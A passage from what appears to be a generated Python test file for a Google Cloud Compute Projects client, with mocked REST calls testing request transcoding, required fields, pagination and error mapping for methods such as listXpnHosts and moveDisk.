        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "get",
                "query_params": request_init,
            }
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.ProjectsGetXpnResources.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.get_xpn_resources(request)
            # No query params beyond the defaults should be sent on the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_get_xpn_resources_rest_unset_required_fields():
    """Unset-required-fields for get_xpn_resources must match the API spec.

    The expected value is the intersection of the method's optional
    paging/filter parameters with its required fields.
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials. Previously the class object itself
        # was passed (missing call parens), unlike every other construction
        # in this file.
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.get_xpn_resources._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("maxResults", "filter", "orderBy", "pageToken", "returnPartialSuccess",))
        & set(("project",))
    )
def test_get_xpn_resources_rest_bad_request(
    transport: str = "rest", request_type=compute.GetXpnResourcesProjectsRequest
):
    """An HTTP 400 reply must surface as core_exceptions.BadRequest."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Build a request that satisfies URL transcoding for this method.
    request = request_type({"project": "sample1"})
    # Fake a 400 response from the underlying session.
    fake_response = Response()
    fake_response.status_code = 400
    fake_response.request = Request()
    with mock.patch.object(Session, "request") as req:
        req.return_value = fake_response
        with pytest.raises(core_exceptions.BadRequest):
            client.get_xpn_resources(request)
def test_get_xpn_resources_rest_flattened():
    """Flattened kwargs for get_xpn_resources must expand into the URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.ProjectsGetXpnResources()
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.ProjectsGetXpnResources.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        # get arguments that satisfy an http rule for this method
        sample_request = {"project": "sample1"}
        # get truthy value for each flattened field
        mock_args = dict(project="project_value",)
        # sample_request values win for keys present in both dicts.
        mock_args.update(sample_request)
        client.get_xpn_resources(**mock_args)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        # args[1] is validated against the http rule's URL template.
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/getXpnResources"
            % client.transport._host,
            args[1],
        )
def test_get_xpn_resources_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Supplying both a fully-formed request and flattened fields is ambiguous.
    request = compute.GetXpnResourcesProjectsRequest()
    with pytest.raises(ValueError):
        client.get_xpn_resources(request, project="project_value")
def test_get_xpn_resources_rest_pager(transport: str = "rest"):
    """The pager must walk all pages, flatten items, and expose page tokens."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # TODO(kbandes): remove this mock unless there's a good reason for it.
        # with mock.patch.object(path_template, 'transcode') as transcode:
        # Set the response as a series of pages
        response = (
            compute.ProjectsGetXpnResources(
                resources=[
                    compute.XpnResourceId(),
                    compute.XpnResourceId(),
                    compute.XpnResourceId(),
                ],
                next_page_token="abc",
            ),
            compute.ProjectsGetXpnResources(resources=[], next_page_token="def",),
            compute.ProjectsGetXpnResources(
                resources=[compute.XpnResourceId(),], next_page_token="ghi",
            ),
            compute.ProjectsGetXpnResources(
                resources=[compute.XpnResourceId(), compute.XpnResourceId(),],
            ),
        )
        # Two responses for two calls
        response = response + response
        # Wrap the values into proper Response objs
        response = tuple(compute.ProjectsGetXpnResources.to_json(x) for x in response)
        return_values = tuple(Response() for i in response)
        for return_val, response_val in zip(return_values, response):
            return_val._content = response_val.encode("UTF-8")
            return_val.status_code = 200
        # side_effect serves one page per HTTP call, in order.
        req.side_effect = return_values
        sample_request = {"project": "sample1"}
        pager = client.get_xpn_resources(request=sample_request)
        # Iterating the pager flattens the 3 + 0 + 1 + 2 items across pages.
        results = list(pager)
        assert len(results) == 6
        assert all(isinstance(i, compute.XpnResourceId) for i in results)
        # The second series of pages backs this second pager.
        pages = list(client.get_xpn_resources(request=sample_request).pages)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [compute.ListXpnHostsProjectsRequest, dict,])
def test_list_xpn_hosts_rest(request_type):
    """list_xpn_hosts must wrap the REST reply in a ListXpnHostsPager.

    Parametrized over the proto request type and a plain dict, both of which
    the client accepts as the request argument.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["projects_list_xpn_hosts_request_resource"] = {
        "organization": "organization_value"
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.XpnHostList(
            id="id_value",
            kind="kind_value",
            next_page_token="next_page_token_value",
            self_link="self_link_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.XpnHostList.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.list_xpn_hosts(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListXpnHostsPager)
    assert response.id == "id_value"
    assert response.kind == "kind_value"
    assert response.next_page_token == "next_page_token_value"
    assert response.self_link == "self_link_value"
def test_list_xpn_hosts_rest_required_fields(
    request_type=compute.ListXpnHostsProjectsRequest,
):
    """Required fields for list_xpn_hosts survive default-dropping and reach the wire.

    Walks the generated _get_unset_required_fields helper twice: first to
    verify defaulted required fields are reported as unset, then — after
    setting them — to verify only optional query params remain unset.
    """
    transport_class = transports.ProjectsRestTransport

    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )

    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).list_xpn_hosts._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)

    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"

    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).list_xpn_hosts._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(
        ("max_results", "filter", "order_by", "page_token", "return_partial_success",)
    )
    jsonified_request.update(unset_fields)

    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"

    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)

    # Designate an appropriate value for the returned response.
    return_value = compute.XpnHostList()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result

            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.XpnHostList.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value

            response = client.list_xpn_hosts(request)

            # No explicit query params expected: the defaulted required
            # field carries no value onto the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_list_xpn_hosts_rest_unset_required_fields():
    """An empty request reports exactly the optional query params as unset.

    The expected set is the method's optional query parameters minus its
    required fields (intersection with the required-field set is empty for
    the optional params, so the difference formulation below holds).
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials; the original passed the class
        # object itself (missing parentheses), unlike every other call site.
        credentials=ga_credentials.AnonymousCredentials()
    )

    unset_fields = transport.list_xpn_hosts._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("maxResults", "filter", "orderBy", "pageToken", "returnPartialSuccess",))
        & set(("project", "projectsListXpnHostsRequestResource",))
    )
def test_list_xpn_hosts_rest_bad_request(
    transport: str = "rest", request_type=compute.ListXpnHostsProjectsRequest
):
    """An HTTP 400 from the session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # A request body that satisfies URI transcoding.
    request = request_type(
        {
            "project": "sample1",
            "projects_list_xpn_hosts_request_resource": {
                "organization": "organization_value"
            },
        }
    )
    # Fake a 400 reply from the underlying session and expect the mapped error.
    with mock.patch.object(Session, "request") as mocked_request:
        bad_response = Response()
        bad_response.status_code = 400
        bad_response.request = Request()
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.list_xpn_hosts(request)
def test_list_xpn_hosts_rest_flattened():
    """Flattened arguments are transcoded into the expected listXpnHosts URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the session and hand back a successful, empty XpnHostList payload.
    with mock.patch.object(type(client.transport._session), "request") as http_call:
        canned = Response()
        canned.status_code = 200
        canned._content = compute.XpnHostList.to_json(compute.XpnHostList()).encode(
            "UTF-8"
        )
        http_call.return_value = canned

        # Flattened fields; "sample1" is the path-parameter value the http
        # rule needs for transcoding (it overrides the placeholder project).
        client.list_xpn_hosts(
            project="sample1",
            projects_list_xpn_hosts_request_resource=compute.ProjectsListXpnHostsRequest(
                organization="organization_value"
            ),
        )

        # Exactly one HTTP call, hitting the method's URI template.
        assert len(http_call.mock_calls) == 1
        _, call_args, _ = http_call.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/listXpnHosts"
            % client.transport._host,
            call_args[1],
        )
def test_list_xpn_hosts_rest_flattened_error(transport: str = "rest"):
    """Passing a request object together with flattened fields must raise."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    resource = compute.ProjectsListXpnHostsRequest(organization="organization_value")
    # Mixing a full request object with flattened arguments is ambiguous
    # and rejected by the generated client surface.
    with pytest.raises(ValueError):
        client.list_xpn_hosts(
            compute.ListXpnHostsProjectsRequest(),
            project="project_value",
            projects_list_xpn_hosts_request_resource=resource,
        )
def test_list_xpn_hosts_rest_pager(transport: str = "rest"):
    """The list_xpn_hosts pager walks next_page_token links across pages.

    Queues four fake pages (3 + 0 + 1 + 2 items) twice via side_effect:
    once consumed by list(pager) and once by iterating .pages.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # TODO(kbandes): remove this mock unless there's a good reason for it.
        # with mock.patch.object(path_template, 'transcode') as transcode:
        # Set the response as a series of pages
        response = (
            compute.XpnHostList(
                items=[compute.Project(), compute.Project(), compute.Project(),],
                next_page_token="abc",
            ),
            compute.XpnHostList(items=[], next_page_token="def",),
            compute.XpnHostList(items=[compute.Project(),], next_page_token="ghi",),
            compute.XpnHostList(items=[compute.Project(), compute.Project(),],),
        )
        # Two responses for two calls
        response = response + response

        # Wrap the values into proper Response objs
        response = tuple(compute.XpnHostList.to_json(x) for x in response)
        return_values = tuple(Response() for i in response)
        for return_val, response_val in zip(return_values, response):
            return_val._content = response_val.encode("UTF-8")
            return_val.status_code = 200
        req.side_effect = return_values

        sample_request = {"project": "sample1"}
        sample_request[
            "projects_list_xpn_hosts_request_resource"
        ] = compute.ProjectsListXpnHostsRequest(organization="organization_value")

        pager = client.list_xpn_hosts(request=sample_request)

        # 6 items total across the four pages above.
        results = list(pager)
        assert len(results) == 6
        assert all(isinstance(i, compute.Project) for i in results)

        # Second pass consumes the duplicated page sequence; the final page
        # has no next_page_token, hence the trailing "".
        pages = list(client.list_xpn_hosts(request=sample_request).pages)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [compute.MoveDiskProjectRequest, dict,])
def test_move_disk_unary_rest(request_type):
    """move_disk_unary deserializes a mocked Operation and exposes every field.

    Parametrized over the proto request class and a plain dict to confirm
    both input forms are accepted by the client method.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["disk_move_request_resource"] = {
        "destination_zone": "destination_zone_value",
        "target_disk": "target_disk_value",
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        # Every Operation field is populated so the assertions below verify
        # a full round-trip through JSON serialization.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.move_disk_unary(request)

    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_move_disk_unary_rest_required_fields(
    request_type=compute.MoveDiskProjectRequest,
):
    """Required fields for move_disk survive default-dropping and reach the wire.

    Walks the generated _get_unset_required_fields helper twice: first to
    verify defaulted required fields are reported as unset, then — after
    setting them — to verify only the optional request_id remains unset.
    """
    transport_class = transports.ProjectsRestTransport

    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )

    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).move_disk._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)

    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"

    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).move_disk._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)

    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"

    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)

    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result

            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value

            response = client.move_disk_unary(request)

            # No explicit query params expected: the defaulted required
            # field carries no value onto the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_move_disk_unary_rest_unset_required_fields():
    """An empty request reports exactly the optional query params as unset.

    The expected set is the optional requestId minus the method's required
    fields (the intersection below is empty, so nothing required leaks in).
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials; the original passed the class
        # object itself (missing parentheses), unlike every other call site.
        credentials=ga_credentials.AnonymousCredentials()
    )

    unset_fields = transport.move_disk._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("requestId",)) & set(("diskMoveRequestResource", "project",))
    )
def test_move_disk_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.MoveDiskProjectRequest
):
    """An HTTP 400 from the session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # A request body that satisfies URI transcoding.
    request = request_type(
        {
            "project": "sample1",
            "disk_move_request_resource": {
                "destination_zone": "destination_zone_value",
                "target_disk": "target_disk_value",
            },
        }
    )
    # Fake a 400 reply from the underlying session and expect the mapped error.
    with mock.patch.object(Session, "request") as mocked_request:
        bad_response = Response()
        bad_response.status_code = 400
        bad_response.request = Request()
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.move_disk_unary(request)
def test_move_disk_unary_rest_flattened():
    """Flattened arguments are transcoded into the expected moveDisk URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the session and hand back a successful, empty Operation payload.
    with mock.patch.object(type(client.transport._session), "request") as http_call:
        canned = Response()
        canned.status_code = 200
        canned._content = compute.Operation.to_json(compute.Operation()).encode(
            "UTF-8"
        )
        http_call.return_value = canned

        # Flattened fields; "sample1" is the path-parameter value the http
        # rule needs for transcoding (it overrides the placeholder project).
        client.move_disk_unary(
            project="sample1",
            disk_move_request_resource=compute.DiskMoveRequest(
                destination_zone="destination_zone_value"
            ),
        )

        # Exactly one HTTP call, hitting the method's URI template.
        assert len(http_call.mock_calls) == 1
        _, call_args, _ = http_call.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/moveDisk"
            % client.transport._host,
            call_args[1],
        )
def test_move_disk_unary_rest_flattened_error(transport: str = "rest"):
    """Passing a request object together with flattened fields must raise."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    resource = compute.DiskMoveRequest(destination_zone="destination_zone_value")
    # Mixing a full request object with flattened arguments is ambiguous
    # and rejected by the generated client surface.
    with pytest.raises(ValueError):
        client.move_disk_unary(
            compute.MoveDiskProjectRequest(),
            project="project_value",
            disk_move_request_resource=resource,
        )
def test_move_disk_unary_rest_error():
    """Smoke test: constructing a REST-transport client must not raise."""
    _ = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest"
    )
@pytest.mark.parametrize("request_type", [compute.MoveInstanceProjectRequest, dict,])
def test_move_instance_unary_rest(request_type):
    """move_instance_unary deserializes a mocked Operation and exposes every field.

    Parametrized over the proto request class and a plain dict to confirm
    both input forms are accepted by the client method.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["instance_move_request_resource"] = {
        "destination_zone": "destination_zone_value",
        "target_instance": "target_instance_value",
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        # Every Operation field is populated so the assertions below verify
        # a full round-trip through JSON serialization.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.move_instance_unary(request)

    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_move_instance_unary_rest_required_fields(
    request_type=compute.MoveInstanceProjectRequest,
):
    """Required fields for move_instance survive default-dropping and reach the wire.

    Walks the generated _get_unset_required_fields helper twice: first to
    verify defaulted required fields are reported as unset, then — after
    setting them — to verify only the optional request_id remains unset.
    """
    transport_class = transports.ProjectsRestTransport

    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )

    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).move_instance._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)

    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"

    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).move_instance._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)

    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"

    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)

    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result

            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value

            response = client.move_instance_unary(request)

            # No explicit query params expected: the defaulted required
            # field carries no value onto the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_move_instance_unary_rest_unset_required_fields():
    """An empty request reports exactly the optional query params as unset.

    The expected set is the optional requestId minus the method's required
    fields (the intersection below is empty, so nothing required leaks in).
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials; the original passed the class
        # object itself (missing parentheses), unlike every other call site.
        credentials=ga_credentials.AnonymousCredentials()
    )

    unset_fields = transport.move_instance._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("requestId",)) & set(("instanceMoveRequestResource", "project",))
    )
def test_move_instance_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.MoveInstanceProjectRequest
):
    """An HTTP 400 from the session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # A request body that satisfies URI transcoding.
    request = request_type(
        {
            "project": "sample1",
            "instance_move_request_resource": {
                "destination_zone": "destination_zone_value",
                "target_instance": "target_instance_value",
            },
        }
    )
    # Fake a 400 reply from the underlying session and expect the mapped error.
    with mock.patch.object(Session, "request") as mocked_request:
        bad_response = Response()
        bad_response.status_code = 400
        bad_response.request = Request()
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.move_instance_unary(request)
def test_move_instance_unary_rest_flattened():
    """Flattened arguments are transcoded into the expected moveInstance URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the session and hand back a successful, empty Operation payload.
    with mock.patch.object(type(client.transport._session), "request") as http_call:
        canned = Response()
        canned.status_code = 200
        canned._content = compute.Operation.to_json(compute.Operation()).encode(
            "UTF-8"
        )
        http_call.return_value = canned

        # Flattened fields; "sample1" is the path-parameter value the http
        # rule needs for transcoding (it overrides the placeholder project).
        client.move_instance_unary(
            project="sample1",
            instance_move_request_resource=compute.InstanceMoveRequest(
                destination_zone="destination_zone_value"
            ),
        )

        # Exactly one HTTP call, hitting the method's URI template.
        assert len(http_call.mock_calls) == 1
        _, call_args, _ = http_call.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/moveInstance"
            % client.transport._host,
            call_args[1],
        )
def test_move_instance_unary_rest_flattened_error(transport: str = "rest"):
    """Passing a request object together with flattened fields must raise."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    resource = compute.InstanceMoveRequest(destination_zone="destination_zone_value")
    # Mixing a full request object with flattened arguments is ambiguous
    # and rejected by the generated client surface.
    with pytest.raises(ValueError):
        client.move_instance_unary(
            compute.MoveInstanceProjectRequest(),
            project="project_value",
            instance_move_request_resource=resource,
        )
def test_move_instance_unary_rest_error():
    """Smoke test: constructing a REST-transport client must not raise."""
    _ = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest"
    )
@pytest.mark.parametrize(
    "request_type", [compute.SetCommonInstanceMetadataProjectRequest, dict,]
)
def test_set_common_instance_metadata_unary_rest(request_type):
    """set_common_instance_metadata_unary deserializes a mocked Operation fully.

    Parametrized over the proto request class and a plain dict to confirm
    both input forms are accepted by the client method.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["metadata_resource"] = {
        "fingerprint": "fingerprint_value",
        "items": [{"key": "key_value", "value": "value_value"}],
        "kind": "kind_value",
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        # Every Operation field is populated so the assertions below verify
        # a full round-trip through JSON serialization.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.set_common_instance_metadata_unary(request)

    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_set_common_instance_metadata_unary_rest_required_fields(
    request_type=compute.SetCommonInstanceMetadataProjectRequest,
):
    """Required fields for set_common_instance_metadata reach the wire intact.

    Walks the generated _get_unset_required_fields helper twice: first to
    verify defaulted required fields are reported as unset, then — after
    setting them — to verify only the optional request_id remains unset.
    """
    transport_class = transports.ProjectsRestTransport

    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
